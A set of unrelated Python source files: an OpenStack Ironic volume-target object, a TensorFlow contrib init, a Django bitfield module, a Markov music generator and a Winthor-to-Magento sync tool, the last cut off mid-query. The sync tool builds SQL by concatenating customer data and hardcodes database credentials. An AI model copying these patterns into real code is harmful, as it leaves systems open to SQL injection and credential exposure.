fields = {
'id': object_fields.IntegerField(),
'uuid': object_fields.UUIDField(nullable=True),
'node_id': object_fields.IntegerField(nullable=True),
'volume_type': object_fields.StringField(nullable=True),
'properties': object_fields.FlexibleDictField(nullable=True),
'boot_index': object_fields.IntegerField(nullable=True),
'volume_id': object_fields.StringField(nullable=True),
'extra': object_fields.FlexibleDictField(nullable=True),
}
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get(cls, context, ident):
"""Find a volume target based on its ID or UUID.
:param context: security context
:param ident: the database primary key ID *or* the UUID of a volume
target
:returns: a :class:`VolumeTarget` object
:raises: InvalidIdentity if ident is neither an integer ID nor a UUID
:raises: VolumeTargetNotFound if no volume target with this ident
exists
"""
if strutils.is_int_like(ident):
return cls.get_by_id(context, ident)
elif uuidutils.is_uuid_like(ident):
return cls.get_by_uuid(context, ident)
else:
raise exception.InvalidIdentity(identity=ident)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get_by_id(cls, context, db_id):
"""Find a volume target based on its database ID.
:param cls: the :class:`VolumeTarget`
:param context: security context
:param db_id: the database primary key (integer) ID of a volume target
:returns: a :class:`VolumeTarget` object
:raises: VolumeTargetNotFound if no volume target with this ID exists
"""
db_target = cls.dbapi.get_volume_target_by_id(db_id)
target = cls._from_db_object(context, cls(), db_target)
return target
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get_by_uuid(cls, context, uuid):
"""Find a volume target based on its UUID.
:param cls: the :class:`VolumeTarget`
:param context: security context
:param uuid: the UUID of a volume target
:returns: a :class:`VolumeTarget` object
:raises: VolumeTargetNotFound if no volume target with this UUID exists
"""
db_target = cls.dbapi.get_volume_target_by_uuid(uuid)
target = cls._from_db_object(context, cls(), db_target)
return target
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def list(cls, context, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Return a list of VolumeTarget objects.
:param context: security context
:param limit: maximum number of resources to return in a single result
:param marker: pagination marker for large data sets
:param sort_key: column to sort results by
:param sort_dir: direction to sort. "asc" or "desc".
:returns: a list of :class:`VolumeTarget` objects
:raises: InvalidParameterValue if sort_key does not exist
"""
db_targets = cls.dbapi.get_volume_target_list(limit=limit,
marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
return cls._from_db_object_list(context, db_targets)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def list_by_node_id(cls, context, node_id, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Return a list of VolumeTarget objects related to a given node ID.
:param context: security context
:param node_id: the integer ID of the node
:param limit: maximum number of resources to return in a single result
:param marker: pagination marker for large data sets
:param sort_key: column to sort results by
:param sort_dir: direction to sort. "asc" or "desc".
:returns: a list of :class:`VolumeTarget` objects
:raises: InvalidParameterValue if sort_key does not exist
"""
db_targets = cls.dbapi.get_volume_targets_by_node_id(
node_id,
limit=limit,
marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
return cls._from_db_object_list(context, db_targets)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def list_by_volume_id(cls, context, volume_id, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Return a list of VolumeTarget objects related to a given volume ID.
:param context: security context
:param volume_id: the UUID of the volume
:param limit: maximum number of volume targets to return in a
single result
:param marker: pagination marker for large data sets
:param sort_key: column to sort results by
:param sort_dir: direction to sort. "asc" or "desc".
:returns: a list of :class:`VolumeTarget` objects
:raises: InvalidParameterValue if sort_key does not exist
"""
db_targets = cls.dbapi.get_volume_targets_by_volume_id(
volume_id,
limit=limit,
marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
return cls._from_db_object_list(context, db_targets)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def create(self, context=None):
"""Create a VolumeTarget record in the DB.
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: VolumeTargetBootIndexAlreadyExists if a volume target already
exists with the same node ID and boot index
:raises: VolumeTargetAlreadyExists if a volume target with the same
UUID exists
"""
values = self.do_version_changes_for_db()
db_target = self.dbapi.create_volume_target(values)
self._from_db_object(self._context, self, db_target)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def destroy(self, context=None):
"""Delete the VolumeTarget from the DB.
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: VolumeTargetNotFound if the volume target cannot be found
"""
self.dbapi.destroy_volume_target(self.uuid)
self.obj_reset_changes()
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def save(self, context=None):
"""Save updates to this VolumeTarget.
Updates will be made column by column based on the result
of self.do_version_changes_for_db().
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: InvalidParameterValue if the UUID is being changed
:raises: VolumeTargetBootIndexAlreadyExists if a volume target already
exists with the same node ID and boot index values
:raises: VolumeTargetNotFound if the volume target cannot be found
"""
updates = self.do_version_changes_for_db()
updated_target = self.dbapi.update_volume_target(self.uuid, updates)
self._from_db_object(self._context, self, updated_target)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def refresh(self, context=None):
"""Loads updates for this VolumeTarget.
Load a volume target with the same UUID from the database
and check for updated attributes. If there are any updates,
they are applied from the loaded volume target, column by column.
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: VolumeTargetNotFound if the volume target cannot be found
"""
current = self.get_by_uuid(self._context, uuid=self.uuid)
self.obj_refresh(current)
self.obj_reset_changes()
@base.IronicObjectRegistry.register
class VolumeTargetCRUDNotification(notification.NotificationBase):
"""Notification emitted at CRUD of a volume target."""
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': object_fields.ObjectField('VolumeTargetCRUDPayload')
}
@base.IronicObjectRegistry.register
class VolumeTargetCRUDPayload(notification.NotificationPayloadBase):
# Version 1.0: Initial Version
VERSION = '1.0'
SCHEMA = {
'boot_index': ('target', 'boot_index'),
'extra': ('target', 'extra'),
'properties': ('target', 'properties'),
'volume_id': ('target', 'volume_id'),
'volume_type': ('target', 'volume_type'),
'created_at': ('target', 'created_at'),
'updated_at': ('target', 'updated_at'),
'uuid': ('target', 'uuid'),
}
fields = {
'boot_index': object_fields.IntegerField(nullable=True),
'extra': object_fields.FlexibleDictField(nullable=True),
'node_uuid': object_fields.UUIDField(),
'properties': object_fields.FlexibleDictField(nullable=True),
'volume_id': object_fields.StringField(nullable=True),
'volume_type': object_fields.StringField(nullable=True),
'created_at': object_fields.DateTimeField(nullable=True),
'updated_at': object_fields.DateTimeField(nullable=True),
'uuid': object_fields.UUIDField(),
}
def __init__(self, target, node_uuid):
super(VolumeTargetCRUDPayload, self).__init__(node_uuid=node_uuid)
self.populate_schema(target=target)
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training and input utilities.
See
[Contrib Training](https://tensorflow.org/api_guides/python/contrib.training)
guide.
@@batch_sequences_with_states
@@NextQueuedSequenceBatch
@@SequenceQueueingStateSaver
@@rejection_sample
@@resample_at_rate
@@stratified_sample
@@weighted_resample
@@bucket
@@bucket_by_sequence_length
@@RandomStrategy
@@GreedyLoadBalancingStrategy
@@byte_size_load_fn
@@FailureTolerator
@@rejection_sample
@@stratified_sample
@@resample_at_rate
@@weighted_resample
@@HParams
@@HParamDef
@@parse_values
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.contrib.training.python.training.bucket_ops import *
from tensorflow.contrib.training.python.training.device_setter import *
from tensorflow.contrib.training.python.training.evaluation import checkpoints_iterator
from tensorflow.contrib.training.python.training.evaluation import evaluate_once
from tensorflow.contrib.training.python.training.evaluation import evaluate_repeatedly
from tensorflow.contrib.training.python.training.evaluation import get_or_create_eval_step
from tensorflow.contrib.training.python.training.evaluation import StopAfterNEvalsHook
from tensorflow.contrib.training.python.training.evaluation import SummaryAtEndHook
from tensorflow.contrib.training.python.training.evaluation import wait_for_new_checkpoint
from tensorflow.contrib.training.python.training.feeding_queue_runner import FeedingQueueRunner
from tensorflow.contrib.training.python.training.hparam import *
from tensorflow.contrib.training.python.training.resample import *
from tensorflow.contrib.training.python.training.sampling_ops import *
from tensorflow.contrib.training.python.training.sequence_queueing_state_saver import *
from tensorflow.contrib.training.python.training.tensor_queue_dataset import enqueue_in_queue_dataset
from tensorflow.contrib.training.python.training.tensor_queue_dataset import prepend_from_queue_and_padded_batch_dataset
from tensorflow.contrib.training.python.training.training import add_gradients_summaries
from tensorflow.contrib.training.python.training.training import clip_gradient_norms
from tensorflow.contrib.training.python.training.training import clip_gradient_norms_fn
from tensorflow.contrib.training.python.training.training import create_train_op
from tensorflow.contrib.training.python.training.training import multiply_gradients
from tensorflow.contrib.training.python.training.training import train
from tensorflow.contrib.training.python.training.tuner import Tuner
# pylint: enable=unused-import,wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
# Allow explicitly imported symbols. Symbols imported with * must also be
# whitelisted here or in the module docstring above.
_allowed_symbols = [
'checkpoints_iterator', 'evaluate_once', 'evaluate_repeatedly',
'FeedingQueueRunner', 'get_or_create_eval_step', 'StopAfterNEvalsHook',
'SummaryAtEndHook', 'wait_for_new_checkpoint', 'add_gradients_summaries',
'clip_gradient_norms', 'clip_gradient_norms_fn', 'create_train_op',
'multiply_gradients', 'enqueue_in_queue_dataset',
'prepend_from_queue_and_padded_batch_dataset', 'train']
remove_undocumented(__name__, _allowed_symbols)
|
from __future__ import absolute_import
from six import string_types
def cmp(a, b):
return (a > b) - (a < b)
class Bit(object):
"""
Represents a single Bit.
"""
def __init__(self, number, is_set=True):
self.number = number
self.is_set = bool(is_set)
self.mask = 2 ** int(number)
self.children = []
if not self.is_set:
self.mask = ~self.mask
def __repr__(self):
return '<%s: number=%d, is_set=%s>' % (self.__class__.__name__, self.number, self.is_set)
# def __str__(self):
# if self.is_set:
# return 'Yes'
# return 'No'
def __int__(self):
return self.mask
def __bool__(self):
return self.is_set
__nonzero__ = __bool__
def __eq__(self, value):
if isinstance(value, Bit):
return value.number == self.number and value.is_set == self.is_set
elif isinstance(value, bool):
return value == self.is_set
elif isinstance(value, int):
return value == self.mask
return value == self.is_set
def __ne__(self, value):
return not self == value
def __coerce__(self, value):
return (self.is_set, bool(value))
def __invert__(self):
return self.__class__(self.number, not self.is_set)
def __and__(self, value):
if isinstance(value, Bit):
value = value.mask
return value & self.mask
def __rand__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask & value
def __or__(self, value):
if isinstance(value, Bit):
value = value.mask
return value | self.mask
def __ror__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask | value
def __lshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return value << self.mask
def __rlshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask << value
def __rshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return value >> self.mask
def __rrshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask >> value
def __xor__(self, value):
if isinstance(value, Bit):
value = value.mask
return value ^ self.mask
def __rxor__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask ^ value
def __sentry__(self):
return repr(self)
def evaluate(self, evaluator, qn, connection):
return self.mask, []
def prepare(self, evaluator, query, allow_joins):
return evaluator.prepare_node(self, query, allow_joins)
class BitHandler(object):
"""
Represents an array of bits, each as a ``Bit`` object.
"""
def __init__(self, value, keys, labels=None):
# TODO: change to bitarray?
if value:
self._value = int(value)
else:
self._value = 0
self._keys = keys
self._labels = labels is not None and labels or keys
def __eq__(self, other):
if not isinstance(other, BitHandler):
return False
return self._value == other._value
def __lt__(self, other):
return int(self._value) < other
def __le__(self, other):
return int(self._value) <= other
def __gt__(self, other):
return int(self._value) > other
def __ge__(self, other):
return int(self._value) >= other
def __cmp__(self, other):
return cmp(self._value, other)
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, ', '.join('%s=%s' % (k, self.get_bit(n).is_set) for n, k in enumerate(self._keys)),)
def __str__(self):
return str(self._value)
def __int__(self):
return self._value
def __bool__(self):
return bool(self._value)
__nonzero__ = __bool__
def __and__(self, value):
return BitHandler(self._value & int(value), self._keys)
def __or__(self, value):
return BitHandler(self._value | int(value), self._keys)
def __add__(self, value):
return BitHandler(self._value + int(value), self._keys)
def __sub__(self, value):
return BitHandler(self._value - int(value), self._keys)
def __lshift__(self, value):
return BitHandler(self._value << int(value), self._keys)
def __rshift__(self, value):
return BitHandler(self._value >> int(value), self._keys)
def __xor__(self, value):
return BitHandler(self._value ^ int(value), self._keys)
def __contains__(self, key):
bit_number = self._keys.index(key)
return bool(self.get_bit(bit_number))
def __getattr__(self, key):
if key.startswith('_'):
return object.__getattribute__(self, key)
if key not in self._keys:
raise AttributeError('%s is not a valid flag' % key)
return self.get_bit(self._keys.index(key))
def __setattr__(self, key, value):
if key.startswith('_'):
return object.__setattr__(self, key, value)
if key not in self._keys:
raise AttributeError('%s is not a valid flag' % key)
self.set_bit(self._keys.index(key), value)
def __iter__(self):
return self.iteritems()
def __sentry__(self):
return repr(self)
def _get_mask(self):
return self._value
mask = property(_get_mask)
def evaluate(self, evaluator, qn, connection):
return self.mask, []
def get_bit(self, bit_number):
mask = 2 ** int(bit_number)
return Bit(bit_number, self._value & mask != 0)
def set_bit(self, bit_number, true_or_false):
mask = 2 ** int(bit_number)
if true_or_false:
self._value |= mask
else:
self._value &= (~mask)
return Bit(bit_number, self._value & mask != 0)
def keys(self):
return self._keys
def iterkeys(self):
return iter(self._keys)
def items(self):
return list(self.iteritems())
def iteritems(self):
for k in self._keys:
yield (k, getattr(self, k).is_set)
def get_label(self, flag):
if isinstance(flag, string_types):
flag = self._keys.index(flag)
if isinstance(flag, Bit):
flag = flag.number
return self._labels[flag]
import django
if django.VERSION[:2] >= (1, 8):
from django.core.exceptions import ImproperlyConfigured
# We need to register adapters in Django 1.8 in order to prevent
# "ProgrammingError: can't adapt type"
try:
from django.db.backends.sqlite3.base import Database
Database.register_adapter(Bit, lambda x: int(x))
Database.register_adapter(BitHandler, lambda x: int(x))
except ImproperlyConfigured:
pass
try:
from django.db.backends.postgresql.base import Database
Database.extensions.register_adapter(Bit, lambda x: Database.extensions.AsIs(int(x)))
Database.extensions.register_adapter(BitHandler, lambda x: Database.extensions.AsIs(int(x)))
except ImproperlyConfigured:
pass
|
"""
usage: generator <input-file> [<method>]['--markov-order'] [--midi=FILE|--timed-play]
[--timed-play-input|--play-input] [--markov-order=INT]
exemple:
python -m generator mymusic.tsv --midi=mymusic.mid
"""
import csv
import docopt
from generator import generator
from generator import classifier
from generator import music_player
INPUT_DELIM = '\t'
def notes_from_file(filename:str, delimiter:str=INPUT_DELIM) -> iter:
"""Yield pairs (millisecond, note) found in given file.
Given file should be a DSV file with delimiter `delimiter`,
and expose two values per lines, millisecond and note.
"""
with open(filename) as fd:
yield from ((int(note), int(ms))
for ms, note in csv.reader(fd, delimiter=delimiter))
if __name__ == "__main__":
args = docopt.docopt(__doc__)
markov_order = int(args['--markov-order'] or 3)
assert markov_order >= 1, "Markov chain order should be >= 1"
gen_method = generator.get_method(args['<method>'] or 'DI')
notes, mss = (zip(*tuple(notes_from_file(args['<input-file>']))))
if args['--play-input'] or args['--timed-play-input']:
print('PLAYING INPUT MUSIC…')
player = music_player.play if args['--play-input'] else music_player.timed_play
player(zip(notes, mss))
CLASSIF_K, SPEED = 6, 0.07
classif = classifier.clusterizer_by(CLASSIF_K)
classif_value = {c: (idx*2)*SPEED for idx, c in enumerate(range(CLASSIF_K), start=1)}
#gen = gen_method(notes, mss, time_classifier=classif, note_number=100)
gen = gen_method(notes, mss, time_classifier=classif, note_number=200,
note_chain_order=markov_order, time_chain_order=markov_order)
if args['--midi']:
print('Midi file {} will be overwritten.'.format(args['--midi']))
music_player.midi_writer(gen, classif_value,
midi_filename=args['--midi'])
else:
print('PLAYING GENERATED MUSIC…')
if args['--timed-play']:
music_player.play(gen, classif_value)
else: # play it without timer
music_player.timed_play(gen, classif_value)
|
# coding: utf-8
from base import *
from PySide import QtGui, QtCore
import time
import requests
import xmltodict
import xml.etree.ElementTree as ET
import math
import json
from datetime import datetime, date, timedelta
from collections import OrderedDict
from magento import Magento
import traceback
class Routine9813(WinthorRoutine):
def __init__(self, *args):
# super(WinthorRoutine, self).__init__('TESTE')
print(args)
super(Routine9813, self).__init__(args[4] or 9813, u'Integração e-commerce', *args)
self.initUI()
self.initWorkers()
def initWorkers(self):
self.priceWorker = PriceWorker()
self.priceWorker.updateProgress.connect(self.setPriceProgress)
self.priceWorker.start()
self.stockWorker = StockWorker()
self.stockWorker.updateProgress.connect(self.setStockProgress)
self.stockWorker.start()
self.ordersWorker = OrdersWorker()
self.ordersWorker.updateProgress.connect(self.setOrdersProgress)
self.ordersWorker.start()
def initUI(self):
super(Routine9813, self).initUI()
self.tabControl = QtGui.QTabWidget(self)
self.mainwindow.addWidget(self.tabControl)
self.priceTab = QtGui.QWidget()
self.stockTab = QtGui.QWidget()
self.ordersTab = QtGui.QWidget()
self.tabControl.addTab(self.priceTab,u"Preço")
self.tabControl.addTab(self.stockTab,u"Estoque")
self.tabControl.addTab(self.ordersTab,u"Pedidos")
self.priceTabUI()
self.stockTabUI()
self.ordersTabUI()
def priceTabUI(self):
self.priceProgressBar = QtGui.QProgressBar(self)
self.priceProgressBar.setGeometry(QtCore.QRect(20, 10, 361, 23))
self.priceProgressBar.setProperty("value", 24)
self.priceProgressBar.setObjectName("priceProgressBar")
self.priceLog = QtGui.QTextEdit(self)
row = QtGui.QHBoxLayout()
row.addWidget(QtGui.QLabel("Progresso:"))
row.addWidget(self.priceProgressBar)
self.priceStopButton = QtGui.QPushButton('Parar', self)
self.priceStopButton.setEnabled(False)
self.priceStopButton.clicked.connect(self.togglePriceWorker)
self.priceRestartButton = QtGui.QPushButton('Reiniciar', self)
self.priceRestartButton.setEnabled(False)
self.priceRestartButton.clicked.connect(self.resetPriceWorker)
buttonRow = QtGui.QHBoxLayout()
buttonRow.addStretch(1)
buttonRow.addWidget(self.priceStopButton)
buttonRow.addWidget(self.priceRestartButton)
layout = QtGui.QVBoxLayout()
layout.addLayout(row)
layout.addWidget(self.priceLog)
layout.addLayout(buttonRow)
self.priceTab.setLayout(layout)
def stockTabUI(self):
self.stockProgressBar = QtGui.QProgressBar(self)
self.stockProgressBar.setGeometry(QtCore.QRect(20, 10, 361, 23))
self.stockProgressBar.setProperty("value", 24)
self.stockProgressBar.setObjectName("stockProgressBar")
self.stockLog = QtGui.QTextEdit(self)
row = QtGui.QHBoxLayout()
row.addWidget(QtGui.QLabel("Progresso:"))
row.addWidget(self.stockProgressBar)
self.stockStopButton = QtGui.QPushButton('Parar', self)
self.stockStopButton.setEnabled(False)
self.stockStopButton.clicked.connect(self.toggleStockWorker)
self.stockRestartButton = QtGui.QPushButton('Reiniciar', self)
self.stockRestartButton.setEnabled(False)
self.stockRestartButton.clicked.connect(self.resetStockWorker)
buttonRow = QtGui.QHBoxLayout()
buttonRow.addStretch(1)
buttonRow.addWidget(self.stockStopButton)
buttonRow.addWidget(self.stockRestartButton)
layout = QtGui.QVBoxLayout()
layout.addLayout(row)
layout.addWidget(self.stockLog)
layout.addLayout(buttonRow)
self.stockTab.setLayout(layout)
def ordersTabUI(self):
self.ordersProgressBar = QtGui.QProgressBar(self)
self.ordersProgressBar.setGeometry(QtCore.QRect(20, 10, 361, 23))
self.ordersProgressBar.setProperty("value", 24)
self.ordersProgressBar.setObjectName("ordersProgressBar")
self.ordersHeader = [u'Integração', u'Num. pedido', u'Comprado Em', u'Status', u'Cliente', u'CPF/CNPJ', u'Items', u'Total', u'CEP', u'CODCLI', u'CODENDENTCLI', u'NUMPED']
self.ordersTable = QtGui.QTableView(self)
self.ordersTable.setModel(QTableModel(self, [[]], self.ordersHeader))
row = QtGui.QHBoxLayout()
row.addWidget(QtGui.QLabel("Progresso:"))
row.addWidget(self.ordersProgressBar)
layout = QtGui.QVBoxLayout()
layout.addLayout(row)
layout.addWidget(self.ordersTable)
self.ordersTab.setLayout(layout)
def setPriceProgress(self, progress, log):
self.priceProgressBar.setValue(progress)
self.priceLog.append(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ': ' + log)
cursor = self.priceLog.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
self.priceLog.setTextCursor(cursor)
def togglePriceWorker(self):
self.priceWorker.toggle()
if self.priceWorker.isRunning:
self.tabControl.setTabText(0, u'Preço')
self.priceStopButton.setText('Parar')
else:
self.tabControl.setTabText(0, u'Preço (parado)')
self.priceStopButton.setText('Continuar')
def resetPriceWorker(self):
self.priceWorker.reset()
self.tabControl.setTabText(0, u'Preço')
self.priceStopButton.setText('Parar')
def setStockProgress(self, progress, log):
self.stockProgressBar.setValue(progress)
self.stockLog.append(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ': ' + log)
cursor = self.stockLog.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
self.stockLog.setTextCursor(cursor)
def toggleStockWorker(self):
self.stockWorker.toggle()
if self.stockWorker.isRunning:
self.tabControl.setTabText(1, u'Estoque')
self.stockStopButton.setText('Parar')
else:
self.tabControl.setTabText(1, u'Estoque (parado)')
self.stockStopButton.setText('Continuar')
def resetStockWorker(self):
self.stockWorker.reset()
self.tabControl.setTabText(1, u'Estoque')
self.stockStopButton.setText('Parar')
def setOrdersProgress(self, progress, ordersData):
self.ordersProgressBar.setValue(progress)
data = json.loads(ordersData)
self.ordersTable.setModel(QTableModel(self, data, self.ordersHeader))
def closeEvent(self, event):
self.priceWorker.finish()
self.stockWorker.finish()
self.ordersWorker.finish()
event.accept()
class PriceWorker(QtCore.QThread):
updateProgress = QtCore.Signal(int, str)
def __init__(self):
QtCore.QThread.__init__(self)
self.reset()
def run(self):
while True:
try:
self.reset()
self.updateProgress.emit(0, 'Progress: ' + str(0) + '%.')
# Get Winthor data
self.updateProgress.emit(0, 'Searching product prices on Winthor...')
w = Winthor()
winthor_products = w.getPrices()
winthor_sku_to_price = dict([(p['codigo_produto'], p['preco_venda']) for p in winthor_products])
self.updateProgress.emit(4, 'Found ' + str(len(winthor_products)) + ' product prices on Winthor!')
self.updateProgress.emit(4, 'Progress: ' + str(4) + '%.')
# Get Magento data
self.updateProgress.emit(4, 'Connecting to Magento platform...')
magento = Magento()
self.updateProgress.emit(13, 'Connected!')
self.updateProgress.emit(13, 'Progress: ' + str(13) + '%.')
self.updateProgress.emit(13, 'Searching products on Magento...')
magento_products = sorted(
[p for p in magento.getProducts() if p['sku'].isdigit()],
key=lambda p: int(p['sku'])
)
self.updateProgress.emit(23, 'Found ' + str(len(magento_products)) + ' products on Magento!')
# Update magento data
steps = len(magento_products)
for i, magento_product in enumerate(magento_products):
self.updateProgress.emit(23 + i*77.0/steps, 'Progress: ' + str(23 + i*77.0/steps) + '%.')
old_price = round(float(magento.getProductPrice(magento_product['sku'])['price']), 2)
new_price = round(float(winthor_sku_to_price[magento_product['sku']]), 2)
if old_price == new_price: continue
self.updateProgress.emit(23 + i*77.0/steps, 'Updating price on item #%s from %s to %s...' % (magento_product['sku'], old_price, new_price))
magento.setProductPrice({
'sku': magento_product['sku'],
'product_id': magento_product['product_id'],
'price': str(new_price),
'old_price': old_price,
})
self.updateProgress.emit(100, 'Progress: ' + str(100) + '%.')
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
self.reset()
except Exception as e:
self.updateProgress.emit(0, 'Error: %s' % str(e).encode('utf-8'))
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
def toggle(self):
self.isRunning = not self.isRunning
def reset(self):
self.isRunning = True
self.iteration = 0
def finish(self):
self.terminate()
class StockWorker(QtCore.QThread):
updateProgress = QtCore.Signal(int, str)
def __init__(self):
QtCore.QThread.__init__(self)
self.reset()
def run(self):
while True:
try:
self.reset()
self.updateProgress.emit(0, 'Progress: ' + str(0) + '%.')
# Get Winthor data
self.updateProgress.emit(0, 'Searching product quantities on Winthor...')
w = Winthor()
winthor_products = w.getQuantities()
winthor_products_skus = [p['codigo_produto'] for p in winthor_products]
self.updateProgress.emit(4, 'Found ' + str(len(winthor_products)) + ' product quantities on Winthor!')
self.updateProgress.emit(4, 'Progress: ' + str(4) + '%.')
# Get Magento data
self.updateProgress.emit(4, 'Connecting to Magento platform...')
magento = Magento()
self.updateProgress.emit(13, 'Connected!')
self.updateProgress.emit(13, 'Progress: ' + str(13) + '%.')
self.updateProgress.emit(13, 'Searching product quantities on Magento...')
magento_products = magento.getProductQuantities(winthor_products_skus)
magento_sku_to_qty = dict([(p['sku'], p['qty']) for p in magento_products])
magento_sku_to_id = dict([(p['sku'], p['product_id']) for p in magento_products])
self.updateProgress.emit(23, 'Found ' + str(len(magento_products)) + ' product quantities on Magento!')
self.updateProgress.emit(23, 'Progress: ' + str(23) + '%.')
# Update Magento data
products_qty = sorted([
{
'product_id': magento_sku_to_id[q['codigo_produto']],
'sku': q['codigo_produto'],
'qty': int(q['quantidade_disponivel']),
'old_qty': int(float(magento_sku_to_qty[q['codigo_produto']]))
}
for q in winthor_products
if q['codigo_produto'] in magento_sku_to_id
and float(q['quantidade_disponivel']) != float(magento_sku_to_qty[q['codigo_produto']])
], key=lambda p: p['sku'])
self.updateProgress.emit(23, 'Preparing to update ' + str(len(products_qty)) + ' products on Magento...')
STEP = 100.0
steps = int(math.ceil(len(products_qty)/STEP))
for i in range(steps):
prods = products_qty[int(i*STEP):int(i*STEP+STEP)]
magento.setProductQuantities(prods)
self.updateProgress.emit(23 + (i+1)*77.0/steps, 'Progress: ' + str(23 + (i+1)*77.0/steps) + '%.')
self.updateProgress.emit(23 + (i+1)*77.0/steps, 'Updated ' + str(len(prods)) + ' products on Magento!')
self.updateProgress.emit(100, 'Progress: ' + str(100) + '%.')
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
except Exception as e:
self.updateProgress.emit(0, 'Error: %s' % str(e).encode('utf-8'))
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
def toggle(self):
self.isRunning = not self.isRunning
def reset(self):
self.isRunning = True
self.iteration = 0
def finish(self):
self.terminate()
class OrdersWorker(QtCore.QThread):
updateProgress = QtCore.Signal(int, str)
def __init__(self):
QtCore.QThread.__init__(self)
def run(self):
db = DatabaseAdapter(user='PAPELEXTESTE', password='PAPELEXTESTE', alias='TESTE')
orders = {}
self.updateProgress.emit(50, json.dumps([[]]))
while True:
try:
self.reset()
m = Magento()
response = m.getOrders(today=True)
result = dict([(order['increment_id'], order) for order in response])
for key in result:
if key in orders:
orders[key].update(result[key])
else:
orders[key] = result[key]
for order_id, order in orders.iteritems():
print orders.keys()
print order['increment_id'], order.get('integration')
# print m.getOrder(order['increment_id'])
if 'integration' not in order or order.get('integration') == '':
# check PCCLIENTFV
query = "select count(*) COUNT from PCCLIENTFV where CGCENT = '" + order['customer_taxvat'] + "'"
print query
count = db.query(query)[0]['count']
if count == 0:
today = date.today().strftime('%Y-%m-%d')
query = '''
insert into PCCLIENTFV (IMPORTADO,TIPOOPERACAO,CGCENT,CLIENTE,IEENT,TELENT,CEPENT,CODUSUR1,CODPRACA,OBS,EMAIL,OBSERVACAO_PC,DTINCLUSAO,CODCLI,DTALTERACAO,DTNASC)
values
(
9, -- IMPORTADO
'I', -- TIPOOPERACAO
'%s', -- CGCENT
'%s', -- CLIENTE
'ISENTO', -- IEENT
'%s', -- TELENT
'%s', -- CEPENT
2236, -- CODUSUR1
999999, -- CODPRACA
'P', -- OBS
'%s', -- EMAIL
'Pedido Site %s', -- OBSERVACAO_PC
